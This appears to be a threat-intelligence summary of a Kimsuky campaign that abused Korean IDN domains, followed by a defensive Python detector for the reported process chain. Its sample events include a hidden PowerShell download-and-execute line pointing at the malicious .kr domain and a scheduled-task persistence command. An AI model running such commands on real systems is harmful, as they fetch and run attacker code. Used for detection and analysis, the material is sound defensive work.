APT-C-55 (Kimsuky) group uses Korean domain names to conduct malicious activities
2023-08-28 • Qihoo360 • APT-C-55 (Kimsuky) organization uses Korean domain names to conduct malicious activities
360 Threat Intelligence Center reports that APT-C-55/Kimsuky used Korean-language (IDN) domains in a multi-stage malware campaign. The initial LNK payload decrypted and dropped a VBS script, which downloaded additional VBS code, created a scheduled task for persistence, and fetched PowerShell code used to collect host information and exfiltrate it. Later stages downloaded obfuscated PowerShell from xn--vn4b27hka971hbue.kr infrastructure to capture clipboard contents and keystrokes, while related malicious macro samples fetched payloads from Korean-domain URLs. The report characterizes the activity as part of Kimsuky's continuing attacks against Korean government targets using social engineering, spear phishing, watering holes, malicious HWP or macro files, PE payloads, and LNK files.
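The chain summarized above (script host spawned from a dropped VBS, scheduled-task persistence, PowerShell fetching from a punycode .kr domain) can be turned into simple process-creation detection logic. The following is an added example, not code from the report or from 360; the event records are constructed to resemble that chain, and the only real indicator used is the xn--vn4b27hka971hbue.kr domain named in the summary.

```python
import re
from urllib.parse import urlparse

# Constructed sample process-creation records: (parent image, child image, command line).
# They are shaped like the LNK -> VBS -> schtasks -> PowerShell chain, not taken from the report.
SAMPLE_EVENTS = [
    ("explorer.exe", "wscript.exe", r"wscript.exe C:\Users\u\AppData\Local\Temp\a.vbs"),
    ("wscript.exe", "schtasks.exe", 'schtasks /create /sc minute /mo 30 /tn "Update" /tr "wscript.exe a.vbs"'),
    ("wscript.exe", "powershell.exe",
     "powershell -w hidden -c \"iex (New-Object Net.WebClient).DownloadString('http://xn--vn4b27hka971hbue.kr/p.txt')\""),
    ("explorer.exe", "powershell.exe", "powershell -c Get-Date"),
    ("chrome.exe", "chrome.exe", "chrome.exe https://xn--wgv71a.example/"),  # IDN in a browser: benign here
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)

def idn_hosts(cmdline):
    """Return (ascii_host, unicode_host) for every punycode (xn--) host found in a command line."""
    out = []
    for url in URL_RE.findall(cmdline):
        host = urlparse(url).hostname or ""
        if "xn--" in host.lower():
            try:
                uni = host.encode("ascii").decode("idna")  # show the analyst the Unicode form
            except UnicodeError:
                uni = "<undecodable>"
            out.append((host, uni))
    return out

def classify(parent, child, cmdline):
    """Return the list of reasons one event matches the reported chain (empty if none)."""
    reasons = []
    hosts = idn_hosts(cmdline)
    if hosts and child.lower() in SCRIPT_HOSTS:
        reasons.append("script host fetching from IDN domain: " + ", ".join(f"{a} ({u})" for a, u in hosts))
    if any(h.lower().endswith(".kr") for h, _ in hosts):
        reasons.append("punycode .kr domain in command line")
    if child.lower() == "schtasks.exe" and "/create" in cmdline.lower() and parent.lower() in SCRIPT_HOSTS:
        reasons.append("scheduled task created by a script host (persistence)")
    if parent.lower() in SCRIPT_HOSTS and child.lower() == "powershell.exe":
        reasons.append("PowerShell spawned by a script host")
    return reasons

def scan(events):
    """Apply classify() to every record; return (child image, reasons) for each hit."""
    hits = []
    for parent, child, cmdline in events:
        reasons = classify(parent, child, cmdline)
        if reasons:
            hits.append((child, reasons))
    return hits

if __name__ == "__main__":
    for child, reasons in scan(SAMPLE_EVENTS):
        print(child, "->", "; ".join(reasons))
```

The same rules map directly onto Sysmon Event ID 1 or Windows 4688 fields (ParentImage, Image, CommandLine) in a SIEM query.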